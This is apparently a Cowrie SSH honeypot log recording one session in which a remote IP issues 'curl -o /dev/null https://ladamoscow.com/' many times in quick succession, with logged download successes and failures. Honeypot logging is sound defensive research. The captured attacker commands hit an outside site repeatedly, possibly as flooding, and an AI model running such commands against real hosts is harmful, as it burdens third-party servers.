{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.940717Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.947276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.948164Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.974443Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:07.986574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:07.987694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.014884Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.027066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.028268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.055055Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.066723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.067997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.106041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.107331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.147604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.148719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.150546Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.185013Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.187610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.188772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.222440Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.272115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.273311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","shasum":"c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.277620Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599 to var/lib/cowrie/downloads/c2c612cbe9413ca45d758c1d1833833d501c521785f1b589c2aa1d4debeee599","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.320416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.321457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","shasum":"fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.349173Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e to var/lib/cowrie/downloads/fe10210b679e9681f6708c3962a0181d9c36a64f8243c86de2483921a6f72c2e","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.359188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.360073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.380669Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.397234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.398426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.418242Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.436121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.437124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.480608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.482335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.519286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.520273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.538177Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.557194Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.558156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.587230Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.595025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.595874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.627876Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.632597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.633614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.667734Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.671448Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.672525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.712949Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.734447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.735476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.749184Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.773488Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.774513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.811466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.813085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.849771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.851081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.870755Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.891055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.891958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.932052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.933018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.948989Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:08.971506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:08.972737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.017089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.018355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.055715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.056670Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.077730Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.093657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.094741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.144313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.145335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.186898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.187887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.226547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.227655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.267520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.268573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","shasum":"ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.300208Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba to var/lib/cowrie/downloads/ab436fbd46aa1807404dccc2ebe48d9b530c32c1aa6b0978bda5649e4ab5d3ba","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.306885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.307945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.345339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.346479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.384123Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.386794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.387951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.424848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.425907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.462806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.463779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.500806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.502110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.549117Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.550081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.588294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.589351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.626379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.627749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.664499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.665656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.704813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.705843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.752775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.754068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.788338Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.791774Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.792706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.830964Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.835636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.836601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.879395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.880629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.917311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.918265Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
